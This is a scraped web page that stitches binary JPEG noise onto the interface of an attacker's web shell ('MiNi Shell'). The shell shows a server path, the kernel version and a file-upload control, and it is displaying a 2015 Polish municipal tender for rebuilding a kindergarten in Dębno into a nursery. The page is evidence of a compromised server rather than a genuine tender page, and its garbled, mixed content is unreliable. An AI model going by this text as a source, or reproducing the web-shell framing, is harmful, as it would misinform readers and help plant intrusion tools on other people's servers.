JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150422/56739-N-2015.html

<p class="kh_header"><b>Dębno: Remont, przebudowa oraz rozbudowa Przedszkola nr 2 na potrzebę utworzenia dwóch oddziałów żłobkowych</b><br>
<b>Numer ogłoszenia: 56739 - 2015; data zamieszczenia: 22.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dębno , ul. Marszałka J. Piłsudskiego 5, 74-400 Dębno, woj. zachodniopomorskie, tel. 95 7603001 do 4, faks 95 7602030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.debno.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont, przebudowa oraz rozbudowa Przedszkola nr 2 na potrzebę utworzenia dwóch oddziałów żłobkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Remont, przebudowa oraz rozbudowa Przedszkola nr 2 przy ul. Jana Pawła II 42 w Dębnie, na potrzebę utworzenia dwóch oddziałów żłobkowych wraz z uzyskaniem przez Wykonawcę  pozwolenia na użytkowanie zgodnie z przepisami Prawa budowlanego oraz w zakresie umożliwiającym użytkowanie budynku zgodnie z jego przeznaczeniem wraz z zagospodarowaniem terenu działki, wykonaniem przyłączy i instalacji na zewnątrz budynku oraz niezbędnym wyposażeniem. 
1.1) W ramach przedmiotu zamówienia  należy wykonać następujący zakres prac:   
a) dobudowę budynku - żłobka,
b) kompleksowy remont i przebudowa budynku istniejącego -przedszkola,
c) instalacje wewnętrzne i zewnętrzne, 
d) wyposażenie wewnętrzne, 
e) przyłącza: wodociągowe, kanalizacji sanitarnej i deszczowej, energetyczne,
f) przełożenie ciepłociągu,
g) oświetlenie terenu,
h) wewnętrzny układ komunikacyjny terenu - utwardzenia,
i) wycinka drzewa 1szt. wraz z karczowaniem 2 szt.,
j) altana na wózki wraz z osłoną na pojemniki śmietnikowe,
k) teren zielony - trawniki z rolki.
1.2)	Charakterystyka budynku:
1.2.1) Kubatura obiektu - 5 680 m3.
1.2.2) Powierzchnia użytkowa - 1 242,54 m2, w tym:
a) powierzchnia adaptowana - 575,44 m2,
b) powierzchnia projektowana - 978,74 m2,
c) powierzchnia pomocnicza - 311,64 m2.
1.2.3) Powierzchnia zabudowy - 667,08 m2, w tym:
a) powierzchnia zabudowy projektowana - 393,75 m2,
b) powierzchnia zabudowy istniejąca - 273,33 m2.
1.2.4) Ilość kondygnacji:
a) część istniejąca: podpiwniczenie + 2 kondygnacje nadziemne + poddasze,
b) część projektowana: podpiwniczenie + 2 kondygnacje nadziemne.
1.2.5) Powierzchnia terenu zielonego - 1861,96 m2.
1.3) Budynek znajduje się na terenie objętym ochroną konserwatorską stanowisk archeologicznych.
2) Szczegółowy zakres robót określony jest w dołączonych do specyfikacji istotnych warunków zamówienia Wytycznych do wyceny wg załącznika nr 3, oraz Dokumentacji projektowej. Zamawiający dopuszcza rozwiązania równoważne opisywanym w w/w dokumentacji projektowej zapewniające trwałość, estetykę, bezawaryjność, łatwość w utrzymaniu i konserwacji, ekonomiczność w użytkowaniu.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przebudowa ogrodzenia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1, 45.31.00.00-3, 45.33.00.00-9, 45.34.30.00-3, 45.11.12.91-4, 45.33.12.11-8, 45.33.11.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości 100.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca posiada uprawnienia do wykonywania działalności lub czynności  tj. posiada zarejestrowaną  działalność gospodarczą uwzględniającą w swojej działalności PKD 41.20.Z - Roboty budowlane związane ze wznoszeniem budynków mieszkalnych i niemieszkalnych.
2) Dokumentem potwierdzającym spełnianie tego warunku będzie Oświadczenie, że prowadzi zarejestrowaną działalność gospodarczą z wpisanym w/w numerem PKD - wg załącznika nr 2 pkt. 1 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca posiada wiedzę i doświadczenie tj. w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył:
a) co najmniej dwie budowy budynków kubaturowych, w tym przynajmniej jeden wykonany pod klucz wraz z uzyskaniem pozwolenia na użytkowanie (dotyczy obiektu użyteczności publicznej lub innego obiektu kubaturowego wymagającego uzyskania pozwolenia na użytkowanie) oraz
b) przynajmniej jeden remont lub budowę na terenie objętym ochroną konserwatorską.
2) Dokumentami potwierdzającym spełnianie tego warunku będą łącznie:
a) Oświadczenie wykonawcy, że spełnia wymagane doświadczenie tj. w ostatnich pięciu latach wykonał przynajmniej dwie w/w roboty budowlane, wg załącznika nr 2 pkt.2 do siwz,
b) Wypełniony wykaz wg załącznika nr 4 do siwz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem rodzaju wykonywanego obiektu / robót, datą i miejsca wykonania, a także wskazania dla którego obiektu wykonawca uzyskiwał w imieniu zamawiającego pozwolenie na użytkowanie, oraz które roboty były wykonywane na terenie objętym ochroną konserwatorską.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj.:
a) Osobą, która będzie pełniła funkcję kierownika budowy posiadającą  uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń, uprawniające do kierowania robotami budowlanymi w odniesieniu do konstrukcji oraz architektury obiektu wraz z aktualnym wpisem do Izby Samorządu Zawodowego;
b) Osobą, która będzie pełniła funkcję kierownika robót posiadającą  uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych wraz z aktualnym wpisem do Izby Samorządu Zawodowego;
c) Osobą, która będzie pełniła funkcję kierownika robót posiadającą  uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych posiadającego aktualny wpis do Izby Samorządu Zawodowego; 
d) Osobą, która będzie pełniła funkcję kierownika robót posiadającą  uprawnienia budowlane w ograniczonym zakresie lub bez ograniczeń do kierowania robotami w specjalności inżynieryjnej drogowej posiadającego aktualny wpis do Izby Samorządu Zawodowego;
e) Osobą, która będzie pełniła nadzór archeologiczny spełniającą wymagania określone w  Rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych Dz.U.2011.165.987
f) Brygadami, składającymi się z doświadczonych: murarzy, instalatorów branży sanitarnej i elektrycznej,  pracowników robót wykończeniowych, brukarzy, w ilości zapewniającej wywiązanie się z terminu umownego.
2) Dokumentami potwierdzającymi spełnianie tego warunku będą łącznie:
a) Oświadczenie wykonawcy, że w trakcie realizacji zadania będzie dysponował w/w składem osobowym, spełniającym wymagane doświadczenie i posiadane uprawnienia wraz z informacją o podstawie dysponowania tymi zasobami, wg załącznika nr 2 pkt. 3 do siwz,
b) Wykaz osób, które z ramienia Wykonawcy będą uczestniczyć w wykonywaniu zamówienia wraz z informacją o podstawie do dysponowania tymi osobami wg załącznika nr 5 do siwz (dotyczy ppkt. od a do e),
c) w przypadku personelu niebędącego pracownikiem wykonawcy należy wypełnić Zobowiązanie do współpracy wg załącznika nr 5a do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Sytuacja ekonomiczna i finansowa wykonawcy (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez wykonawców w ramach konsorcjum oceniana będzie ich łączna sytuacja ekonomiczna i finansowa): wykonawca posiada zdolność kredytową lub środki finansowe w wysokości 4 000 000,00 zł;
2) Dokumentami potwierdzającymi spełnianie tego warunku będą łącznie:
a) Oświadczenie wykonawcy, że spełnia wymaganą zdolność finansową, tj. że posiada środki finansowe lub zdolność kredytową w w/w wysokości, wg załącznika nr 2 pkt. 4 do siwz,
b) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej wymieniona w pkt III.4.1) niniejszego ogłoszenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Jeżeli wykonawca, wykazując spełnianie warunków określonych w pkt III.3. polega na zasobach innych podmiotów na zasadach określonych w art.
26 ust. 2b ustawy, przedstawia w tym celu (oprócz dokumentu wymienionego w pkt III.4.1 odnośnik drugi) pisemne zobowiązanie tych podmiotów do
oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz dokumenty dotyczące: - zakresu
dostępnych wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu
zamówienia, - charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, - zakresu i okresu udziału innego podmiotu przy wykonywaniu
zamówienia.
2) Dowód wniesienia wadium. 
3) Formularz ofertowy. 
4) Zestawienie rzeczowo - finansowe. 
5) Zestawienie mebli, sprzętu, wyposażenia.
6) Wykaz osób i podmiotów ubiegających się wspólnie o udzielenie zamówienia.
7) Pełnomocnictwo do reprezentowania w niniejszym postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - okres gwarancji - 2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.debno.com.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego, pokój 31, w cenie 100,-zł. za wydruk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 10:45, miejsce: siedziba zamawiającego, budynek A, sekretariat-pokój nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest realizacją dofinansowanego programu wpierania rozwoju instytucji opieki nad dziećmi w wieku do lat 3 MALUCH Ministerstwa Pracy i Polityki Społecznej. W ramach tego programu planowane jest dofinansowanie w wielkości 2.000.000,00 złotych, pod warunkiem uzyskania pozwolenia na użytkowanie i uruchomienia naboru dla dzieci jeszcze w bieżącym roku. Wykonawca decydując się na realizację niniejszego zamówienia, bierze na siebie ryzyko konieczności zwrócenia Zamawiającemu wielkości dofinansowania w przypadku utracenia dotacji z powodu niewywiązania się przez Wykonawcę z terminów umownych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com